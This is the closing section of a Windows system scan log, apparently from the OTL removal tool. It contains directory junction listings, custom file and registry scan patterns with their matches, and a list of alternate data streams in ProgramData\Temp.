04/03/2010 23:53 <JUNCTION> Application Data [C:\Windows\system32\config\systemprofile\AppData\Local]
04/03/2010 23:53 <JUNCTION> History [C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\History]
04/03/2010 23:53 <JUNCTION> Temporary Internet Files [C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files]
0 File(s) 0 bytes
Directory of C:\Windows\System32\config\systemprofile\Documents
01/03/2012 02:48 <JUNCTION> My Music [C:\Windows\system32\config\systemprofile\Music]
01/03/2012 02:48 <JUNCTION> My Pictures [C:\Windows\system32\config\systemprofile\Pictures]
01/03/2012 02:48 <JUNCTION> My Videos [C:\Windows\system32\config\systemprofile\Videos]
0 File(s) 0 bytes
Directory of C:\Windows\SysWOW64\config\systemprofile
04/03/2010 23:53 <JUNCTION> Application Data [C:\Windows\system32\config\systemprofile\AppData\Roaming]
04/03/2010 23:53 <JUNCTION> Local Settings [C:\Windows\system32\config\systemprofile\AppData\Local]
01/03/2012 02:48 <JUNCTION> My Documents [C:\Windows\system32\config\systemprofile\Documents]
01/03/2012 02:48 <JUNCTION> NetHood [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
01/03/2012 02:48 <JUNCTION> PrintHood [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
01/03/2012 02:48 <JUNCTION> Recent [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Recent]
01/03/2012 02:48 <JUNCTION> SendTo [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\SendTo]
10/02/2010 12:06 <JUNCTION> Start Menu [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu]
01/03/2012 02:48 <JUNCTION> Templates [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Templates]
0 File(s) 0 bytes
Directory of C:\Windows\SysWOW64\config\systemprofile\AppData\Local
04/03/2010 23:53 <JUNCTION> Application Data [C:\Windows\system32\config\systemprofile\AppData\Local]
04/03/2010 23:53 <JUNCTION> History [C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\History]
04/03/2010 23:53 <JUNCTION> Temporary Internet Files [C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files]
0 File(s) 0 bytes
Directory of C:\Windows\SysWOW64\config\systemprofile\Documents
01/03/2012 02:48 <JUNCTION> My Music [C:\Windows\system32\config\systemprofile\Music]
01/03/2012 02:48 <JUNCTION> My Pictures [C:\Windows\system32\config\systemprofile\Pictures]
01/03/2012 02:48 <JUNCTION> My Videos [C:\Windows\system32\config\systemprofile\Videos]
0 File(s) 0 bytes
Total Files Listed:
0 File(s) 0 bytes
143 Dir(s) 143,534,940,160 bytes free
< %systemroot%\System32\config\*.sav >
< %PROGRAMFILES%\bak. /s >
[2014/05/29 10:24:37 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Anvisoft\Cloud System Booster\bak
< %systemroot%\system32\bak. /s >
< %ALLUSERSPROFILE%\Start Menu\*.lnk /x >
< %systemroot%\system32\config\systemprofile\*.dat /x >
< %systemroot%\*.config >
< %systemroot%\system32\*.db >
< %PROGRAMFILES%\Internet Explorer\*.dat >
< %APPDATA%\Microsoft\Internet Explorer\Quick Launch\*.lnk /x >
[2010/03/29 18:03:14 | 000,000,221 | -HS- | M] () -- C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop (1).ini
[2011/09/14 08:47:43 | 000,000,304 | -HS- | M] () -- C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
< %USERPROFILE%\Desktop\*.exe >
[2012/05/24 20:07:55 | 1607,031,952 | ---- | M] (Nexon) -- C:\Users\Owner\Desktop\Combatarms_VER_US_2.1205.04.exe
[2014/05/30 23:07:14 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Owner\Desktop\OTL.exe
[2012/12/17 19:42:33 | 014,784,712 | ---- | M] () -- C:\Users\Owner\Desktop\SolveigMM_HyperCam_3_4_1205_23.exe
[2012/09/07 16:13:34 | 025,685,128 | ---- | M] (Microsoft Corporation) -- C:\Users\Owner\Desktop\wordview_en-us.exe
< %PROGRAMFILES%\Common Files\*.* >
< %systemroot%\*.src >
< %systemroot%\install\*.* >
< %systemroot%\system32\DLL\*.* >
< %systemroot%\system32\HelpFiles\*.* >
< %systemroot%\system32\rundll\*.* >
< %systemroot%\winn32\*.* >
< %systemroot%\Java\*.* >
< %systemroot%\system32\test\*.* >
< %systemroot%\system32\Rundll32\*.* >
< %systemroot%\AppPatch\Custom\*.* >
< HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU >
< HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\Results\Install|LastSuccessTime /rs >
========== Alternate Data Streams ==========
@Alternate Data Stream - 94 bytes -> C:\ProgramData\Temp:C5E4F943
@Alternate Data Stream - 138 bytes -> C:\ProgramData\Temp:55422315
@Alternate Data Stream - 138 bytes -> C:\ProgramData\Temp:2F4A0A6B
@Alternate Data Stream - 136 bytes -> C:\ProgramData\Temp:C46995DA
@Alternate Data Stream - 133 bytes -> C:\ProgramData\Temp:FF9C44FE
@Alternate Data Stream - 132 bytes -> C:\ProgramData\Temp:B683AD23
@Alternate Data Stream - 130 bytes -> C:\ProgramData\Temp:A59DD4AD
@Alternate Data Stream - 122 bytes -> C:\ProgramData\Temp:E0135E7C
@Alternate Data Stream - 118 bytes -> C:\ProgramData\Temp:373E1720
@Alternate Data Stream - 107 bytes -> C:\ProgramData\Temp:A3E39C6A
@Alternate Data Stream - 106 bytes -> C:\ProgramData\Temp:2EF63291
< End of report >